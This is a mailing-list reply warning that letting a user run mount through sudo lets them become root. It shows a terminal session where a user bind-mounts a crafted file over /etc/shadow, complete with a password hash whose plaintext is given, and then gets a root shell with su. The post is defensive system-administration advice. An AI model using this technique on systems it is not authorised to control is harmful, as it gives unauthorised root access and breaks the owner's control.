Re: Giving remaja (teens) group full administrator privileges through sudo - dangerous?

[Andy Smith <andy@strugglers.net>]

Hello,

On Sat, Jun 22, 2019 at 04:44:40PM -0700, Jimmy Johnson wrote:
> Some one mentioned mounting drives, all that and what they need can be
> configured.

Also note that anyone who can use "mount" as root can trivially become
root. If countenancing allowing users to run "mount" as root I would
make scripts that only mounted the exact things to the exact places,
and then let them run those scripts as root.

andy@debtest1:~$ su - bob
Password: 
bob@debtest1:~$ whoami
bob
bob@debtest1:~$ sudo -i
[sudo] password for bob: 
Sorry, user bob is not allowed to execute '/bin/bash' as root on debtest1.vps.bitfolk.com.
bob@debtest1:~$ echo 'bob:$6$K6b1uzg.$pTNKJG/9hIgnhBL53Y2mr0rrsBBZE1xDWE0bO8E94dBlM.itel4/meJTZYL12IIOZ9ck/
3P2/j5XGbyKcKxFK/:18070:0:99999:7:::' > myshadow
bob@debtest1:~$ sudo mount --bind ./myshadow /etc/shadow
bob@debtest1:~$ su -
Password: 
root@debtest1:~# whoami
root

The password of that hash is "letmein1".

So don't give anyone sudo access to /bin/mount unless you are okay
with them being able to become root proper if they really want to.

Cheers,
Andy